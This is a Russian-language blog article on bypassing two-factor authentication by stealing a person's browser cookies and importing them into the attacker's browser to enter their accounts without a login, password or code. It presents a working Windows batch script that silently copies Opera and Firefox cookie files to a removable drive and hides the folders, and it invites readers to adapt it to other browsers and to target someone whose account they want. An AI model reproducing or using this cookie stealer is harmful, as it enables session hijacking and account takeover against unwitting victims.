Взлом и проверка на уязвимости

Обход двухфакторной аутентификации с помощью cookies

Обход двухфакторной аутентификации с помощью cookies

Двухфакторная аутентификация – это один из видом многофакторной аутентификации, известна ещё как “двухэтапная верификация” и представляет собой технологию, обеспечивающую идентификацию пользователей с помощью комбинации двух различных компонентов. Как самый понятный пример, можно взять аутентификацию в Google или Steam. Если вы заходите с нового компьютера, то вам помимо логина и пароля нужно ввести шестизначный код подтверждения. Как правило он приходит через SMS или голосовой вызов. Плюсы двухфакторной аутентификации:
  • Защита одноразовым ключом с помощью подтверждения через смартфон;
  • Смартфон всегда под рукой, тем самым отсутствует необходимость в дополнительных токенах.
Минусы двухфакторной аутентификации через мобильное устройство:
  • Мобильный телефон должен ловить сеть, когда происходит аутентификация, иначе сообщение с паролем просто не дойдет;
  • Возможность перехвата сообщения с кодом подтверждения;
  • Сообщения приходят с задержкой, время уходит на проверку подлинности;
  • Вы делитесь номером, а значит есть возможность, что будет приходить спам.
Обход двухфакторной аутентификации крайне сложный процесс, если работать методом перехвата текстового сообщения может уйти много времени. По этому я расскажу про метод с помощью перехвата, стиллера cookies. На сайте уже есть статья о стиллере паролей – читать, а также с приложениями для Android, для перехвата трафика, в том числе и cookies – click.

Обход двухфакторной аутентификации с помощью подмены cookies

Cookies Существует множество плагинов, позволяющих загрузить свои cookies, скачайте и установите один из них. Для начала требуется перехватить или украсть cookies у человека, к которому вы хотите зайти не зная логина и пароля. Для этого вы можете воспользоваться одним из приложений или переделать наш портативный стиллер, чтобы он работал с Куки. Код для кражи cookies с браузеров Opera & Mozilla: @echo off md %~d0\Mozilla md %~d0\Opera CD/D %APPDATA%\Opera\Opera\ copy /y cookies.dat %~d0\Opera\ cd %AppData%\Mozilla\Firefox\Profiles*.def-ault copy /y cookies.sqlite %~d0\Mozilla ATTRIB -R -A -S -H attrib +h %~d0\Opera attrib +h %~d0\Mozilla Модифицировать данный код под любой браузер не составит труда, главное найти нужные директории. После того, как у вас появились нужные cookies, требуется очистить браузер от всех Куки, которые там есть и добавить те, которые вы перехватили\украли. Всё, можете проверять сервисы. Если человек был на сайте с двухэтапной аутентификацией, то вам не потребуется ни логина-пароля, ни  кода подтверждения, так как вы сразу попадете на авторизованную страницу. Данный обход двухэтапной аутентификации имеет ряд минусов:
  • Не знаете ни логина, ни пароля;
  • Нет возможности изменить пароль или получить резервные коды;
  • Не работает с сервисами, требующими подтверждения каждый раз, вне зависимости от того, был ранее совершен вход с устройства или нет.
Обход двухфакторной аутентификации с помощью подмены cookies – это довольно простой и эффективный способ, которым может воспользоваться абсолютно каждый без особых усилий. Если вам понравилась статья, подписывайтесь на обновление сайта, а также наш Telegram.

Telegram

Подписывайтесь на официальный Telegram канал сайта Make Info.

Proxy White Advertisement

nelus

Программист, SEO специалист, GEEK, увлекаюсь новостями из мира IT и безопасностью программного обеспечения.

2 комментариев

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Back to top button
Close